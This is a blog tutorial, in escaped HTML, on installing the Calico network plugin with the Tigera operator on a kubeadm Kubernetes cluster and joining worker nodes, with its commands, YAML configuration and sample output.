&lt;h3 id=&#34;installing-calico-cni&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#installing-calico-cni&#34;&gt;#&lt;/a&gt; Installing Calico CNI&lt;/h3&gt;
&lt;p&gt;Calico provides network and network security solutions for containers. Calico is best known for its performance, flexibility and power. Use-cases: Calico can be used within a lot of Kubernetes platforms (kops, Kubespray, docker enterprise, etc.) to block or allow traffic between pods, namespaces&lt;/p&gt;
&lt;h4 id=&#34;1-install-tigera-calico-operator&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#1-install-tigera-calico-operator&#34;&gt;#&lt;/a&gt; 1- Install Tigera Calico operator&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl create -f &lt;span class=&#34;string&#34;&gt;&amp;quot;https://projectcalico.docs.tigera.io/manifests/tigera-operator.yaml&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The Tigera Operator is a Kubernetes operator which manages the lifecycle of a Calico or Calico Enterprise installation on Kubernetes. Its goal is to make installation, upgrades, and ongoing lifecycle management of Calico and Calico Enterprise as simple and reliable as possible.&lt;/p&gt;
&lt;h4 id=&#34;2-download-the-custom-resourcesyaml-manifest-and-change-it&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#2-download-the-custom-resourcesyaml-manifest-and-change-it&#34;&gt;#&lt;/a&gt; 2- Download the custom-resources.yaml manifest and change it&lt;/h4&gt;
&lt;p&gt;The Calico has a default pod’s CIDR value. But in our example, we set the   &lt;code&gt;--pod-netwokr-cidr=10.1.0.0/16&lt;/code&gt; . So we must change the value of pod network CIDR in  &lt;code&gt;custom-resources.yaml&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ wget  &lt;span class=&#34;string&#34;&gt;&amp;quot;https://projectcalico.docs.tigera.io/manifests/custom-resources.yaml&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now we edit this file before create the Calico pods&lt;/p&gt;
&lt;figure class=&#34;highlight yml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# This section includes base Calico installation configuration.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# For more information, see: https://projectcalico.docs.tigera.io/v3.23/reference/installation/api#operator.tigera.io/v1.Installation&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;operator.tigera.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Installation&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;default&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;comment&#34;&gt;# Configures Calico networking.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;calicoNetwork:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# &lt;span class=&#34;doctag&#34;&gt;Note:&lt;/span&gt; The ipPools section cannot be modified post-install.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;ipPools:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;blockSize:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;26&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;cidr:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;10.1&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.0&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.0&lt;/span&gt;&lt;span class=&#34;string&#34;&gt;/16&lt;/span&gt; &lt;span class=&#34;comment&#34;&gt;#change this value with yours&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;encapsulation:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;VXLANCrossSubnet&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;natOutgoing:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Enabled&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;nodeSelector:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;all()&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# This section configures the Calico API server.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# For more information, see: https://projectcalico.docs.tigera.io/v3.23/reference/installation/api#operator.tigera.io/v1.APIServer&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;operator.tigera.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;APIServer&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;default&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After Editing the  &lt;code&gt;custom-resources.yaml&lt;/code&gt;  file. Run the following command:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl create -f &lt;span class=&#34;string&#34;&gt;&amp;quot;custom-resources.yaml&amp;quot;&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Before you can use the cluster, you must wait for the pods required by Calico to be downloaded. You must wait until you find all the pods running and ready!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl get pods --all-namespaces&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAMESPACE          NAME                                       READY   STATUS    RESTARTS       AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;calico-apiserver   calico-apiserver-5989576d6d-5nw7n          1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;calico-apiserver   calico-apiserver-5989576d6d-h677h          1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;calico-system      calico-kube-controllers-69cfd64db4-9hnh5   1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;calico-system      calico-node-lshdl                          1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;calico-system      calico-typha-76dd7c96d7-88826              1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        coredns-64897985d-jkpwh                    1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        coredns-64897985d-zk9wx                    1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        etcd-master                                1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        kube-apiserver-master                      1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        kube-controller-manager-master             1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        kube-proxy-4nf4q                           1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-system        kube-scheduler-master                      1/1     Running   1 (4min ago)    4min&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;tigera-operator    tigera-operator-7d8c9d4f67-j5b2g           1/1     Running   2 (103s ago)    4min&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;join-the-worker-nodes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#join-the-worker-nodes&#34;&gt;#&lt;/a&gt; Join the worker nodes&lt;/h2&gt;
&lt;p&gt;Now our cluster is ready to work! let’s join the worker nodes to this cluster by getting the token from the master node&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo kubeadm token create --print-join-command&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubeadm &lt;span class=&#34;built_in&#34;&gt;join&lt;/span&gt; 192.168.1.18:6443 --token g4mgtb.e8zgs1c0kpkaj9wt --discovery-token-ca-cert-hash sha256:047628de2a0a43127b7c4774093203631d315451874efc6b63421a4da9bee2ec&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s move to the worker node and run the following command given by  &lt;code&gt;kubeadm token create&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ sudo kubeadm &lt;span class=&#34;built_in&#34;&gt;join&lt;/span&gt; 192.168.1.18:6443 --token g4mgtb.e8zgs1c0kpkaj9wt &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;\--discovery-token-ca-cert-hash sha256:047628de2a0a43127b7c4774093203631d315451874efc6b63421a4da9bee2ec&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The output must be similar to the following&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;[preflight] Running pre-flight checks&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[preflight] Reading configuration from the cluster...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[preflight] FYI: You can look at this config file with &lt;span class=&#34;string&#34;&gt;&amp;#x27;kubectl -n kube-system get cm kubeadm-config -o yaml&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;W0623 12:45:07.940655   23651 utils.go:69] The recommended value &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;resolvConf&amp;quot;&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;KubeletConfiguration&amp;quot;&lt;/span&gt; is: /run/systemd/resolve/resolv.conf; the provided value is: /run/systemd/resolve/resolv.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[kubelet-start] Writing kubelet configuration to file &lt;span class=&#34;string&#34;&gt;&amp;quot;/var/lib/kubelet/config.yaml&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[kubelet-start] Writing kubelet environment file with flags to file &lt;span class=&#34;string&#34;&gt;&amp;quot;/var/lib/kubelet/kubeadm-flags.env&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[kubelet-start] Starting the kubelet&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[kubelet-start] Waiting &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; the kubelet to perform the TLS Bootstrap...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;This node has joined the cluster:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* Certificate signing request was sent to apiserver and a response was received.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* The Kubelet was informed of the new secure connection details.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Run &lt;span class=&#34;string&#34;&gt;&amp;#x27;kubectl get nodes&amp;#x27;&lt;/span&gt; on the control-plane to see this node &lt;span class=&#34;built_in&#34;&gt;join&lt;/span&gt; the cluster.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s Check the cluster by running  &lt;code&gt;kubectl get nodes&lt;/code&gt;  command on the master node.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl get nodes&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME              STATUS     ROLES                  AGE    VERSION&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-master    Ready      control-plane,master   40m5s  v1.23.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-worker1   Ready      &amp;lt;none&amp;gt;                 3m7s   v1.23.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-worker2   Ready      &amp;lt;none&amp;gt;                 2m3s   v1.23.1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;references&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#references&#34;&gt;#&lt;/a&gt; References:&lt;/h2&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Kubernetes Documentation&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3Mvc2V0dXAvcHJvZHVjdGlvbi1lbnZpcm9ubWVudC90b29scy9rdWJlYWRtL2NyZWF0ZS1jbHVzdGVyLWt1YmVhZG0v&#34; data-background-image=&#34;https://upload.wikimedia.org/wikipedia/commons/thumb/3/39/Kubernetes_logo_without_workmark.svg/1200px-Kubernetes_logo_without_workmark.svg.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3Mvc2V0dXAvcHJvZHVjdGlvbi1lbnZpcm9ubWVudC90b29scy9rdWJlYWRtL2NyZWF0ZS1jbHVzdGVyLWt1YmVhZG0v&#34;&gt;Kubernetes Documentation&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Creating a cluster with kubeadm&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Calico Documentation&#34; style=&#34;--block-color:#FB7031;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9wcm9qZWN0Y2FsaWNvLmRvY3MudGlnZXJhLmlvL2dldHRpbmctc3RhcnRlZC9rdWJlcm5ldGVzL3NlbGYtbWFuYWdlZC1vbnByZW0vb25wcmVtaXNlcw==&#34; data-background-image=&#34;https://projectcalico.docs.tigera.io/images/favicon.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9wcm9qZWN0Y2FsaWNvLmRvY3MudGlnZXJhLmlvL2dldHRpbmctc3RhcnRlZC9rdWJlcm5ldGVzL3NlbGYtbWFuYWdlZC1vbnByZW0vb25wcmVtaXNlcw==&#34;&gt;Calico Documentation&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Install Calico Networking for on-premises deployments&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Docker Documentation&#34; style=&#34;--block-color:#31bffb;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9kb2NzLmRvY2tlci5jb20vZW5naW5lL2luc3RhbGwvdWJ1bnR1Lw==&#34; data-background-image=&#34;https://www.docker.com/wp-content/uploads/2022/05/Docker_Temporary_Image_Google_Blue_1080x1080_v1.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9kb2NzLmRvY2tlci5jb20vZW5naW5lL2luc3RhbGwvdWJ1bnR1Lw==&#34;&gt;Docker Documentation&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Install Docker Engine on Ubuntu&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
</content>
        <updated>2022-08-05T10:54:12.000Z</updated>
    </entry>
</feed>